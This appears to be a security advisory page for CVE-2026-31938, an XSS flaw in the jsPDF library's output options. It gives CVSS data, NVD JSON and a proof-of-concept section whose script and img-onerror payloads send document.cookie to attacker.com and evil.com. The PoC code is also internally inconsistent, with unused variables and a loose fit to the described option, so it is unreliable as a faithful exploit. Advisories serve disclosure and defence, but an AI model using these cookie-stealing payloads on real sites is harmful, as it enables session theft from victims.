Security Vulnerability Report
CVE-2026-31938 CVSS 9.6 CRITICAL

CVE-2026-31938

Published: 2026-03-18 04:17:24
Last Modified: 2026-03-18 18:02:16

Description

jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.2.1, user control of the `options` argument of the `output` function allows attackers to inject arbitrary HTML (such as scripts) into the browser context the created PDF is opened in. The vulnerability can be exploited in the following scenario: the attacker provides values for the output options, for example via a web interface. These values are then passed unsanitized (automatically or semi-automatically) to the attack victim. The victim creates and opens a PDF with the attack vector using one of the vulnerable method overloads inside their browser. The attacker can thus inject scripts that run in the victim's browser context and can extract or modify secrets from this context. The vulnerability has been fixed in jspdf@4.2.1. As a workaround, sanitize user input before passing it to the output method.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:* - VULNERABLE
jsPDF < 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-31938 PoC - jsPDF XSS via output options
// This PoC demonstrates injecting arbitrary HTML/JS through output function

// Vulnerable code pattern (jsPDF < 4.2.1)
const { jsPDF } = require('jspdf');

function generateMaliciousPDF(userProvidedOptions) {
  const doc = new jsPDF();
  doc.text('Test PDF', 10, 10);

  // Vulnerable: user input directly passed to output without sanitization
  const outputOptions = userProvidedOptions;

  // Attack vector example - inject script via output options
  const maliciousOptions = {
    fileName: 'document.pdf',
    output: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
  };

  // Another attack vector - event handler injection
  const eventHandlerOptions = {
    output: '<img src=x onerror="fetch(\"https://attacker.com/exfil?data=\"+btoa(document.cookie))">'
  };

  // Generate PDF with malicious options
  doc.output(maliciousOptions);
  return doc;
}

// Simulated attack scenario
const attackerInput = {
  outputType: 'datauristring',
  data: '<script>document.location="https://evil.com/log?c="+document.cookie</script>'
};

// When victim opens the generated PDF, the script executes in their browser context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31938", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:23.507", "lastModified": "2026-03-18T18:02:15.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.2.1, user control of the `options` argument of the `output` function allows attackers to inject arbitrary HTML (such as scripts) into the browser context the created PDF is opened in. The vulnerability can be exploited in the following scenario: the attacker provides values for the output options, for example via a web interface. These values are then passed unsanitized (automatically or semi-automatically) to the attack victim. The victim creates and opens a PDF with the attack vector using one of the vulnerable method overloads inside their browser. The attacker can thus inject scripts that run in the victims browser context and can extract or modify secrets from this context. The vulnerability has been fixed in jspdf@4.2.1. As a workaround, sanitize user input before passing it to the output method."}, {"lang": "es", "value": "jsPDF es una biblioteca para generar PDFs en JavaScript. Antes de la versión 4.2.1, el control del usuario sobre el argumento 'options' de la función 'output' permite a los atacantes inyectar HTML arbitrario (como scripts) en el contexto del navegador en el que se abre el PDF creado. La vulnerabilidad puede ser explotada en el siguiente escenario: el atacante proporciona valores para las opciones de salida, por ejemplo, a través de una interfaz web. Estos valores se pasan luego sin sanear (automática o semi-automáticamente) a la víctima del ataque. La víctima crea y abre un PDF con el vector de ataque utilizando una de las sobrecargas de método vulnerables dentro de su navegador. El atacante puede así inyectar scripts que se ejecutan en el contexto del navegador de la víctima y puede extraer o modificar secretos de este contexto. La vulnerabilidad ha sido corregida en jspdf@4.2.1. Como solución alternativa, sanear la entrada del usuario antes de pasarla al método de salida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.2.1", "matchCriteriaId": "E32C16E0-23FB-49ED-B364-2170D7FC9935"}]}]}], "references": [{"url": "https://github.com/parallax/jsPDF/commit/87a40bbd07e6b30575196370670b41f264aa78d7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/parallax/jsPDF/releases/tag/v4.2.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-wfv2-pwc8-crg5", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}